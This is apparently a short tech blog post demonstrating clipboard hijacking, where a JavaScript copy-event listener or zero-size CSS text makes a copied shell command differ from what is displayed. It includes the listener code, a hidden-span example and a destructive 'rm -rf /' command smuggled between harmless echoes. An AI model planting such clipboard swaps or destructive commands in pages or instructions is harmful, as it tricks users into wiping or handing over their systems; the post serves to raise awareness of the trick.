Savvy - For everything technical and interesting

Javascript is extremely powerful, to say the least. One of its often overlooked features is the copy event listener.

What damage can that do? Here, copy this ‘innocent’ command (meant to be pasted into a shell) and paste it somewhere.

$ echo "innocent text"

The text you just copied even has an Enter character, so the command will execute automatically if pasted in a shell, and I will have control over this system before you can even comprehend what happened.

This is how the code works,

document.getElementById('fakecopy').addEventListener('copy', function(e) {
    e.clipboardData.setData('text/plain',
        'echo "This could\'ve be something malicious!😈"\n');
    e.preventDefault();
});

Think you’ll be safe by disabling Javascript? Sorry to burst your bubble but this can also be done with raw CSS.

$ echo ; rm -rf / ; echo "looks safe to me!"

This is how that works,

$ echo <span style="font-size: 0">; echo 'malicious command' ; echo </span>"looks safe to me!"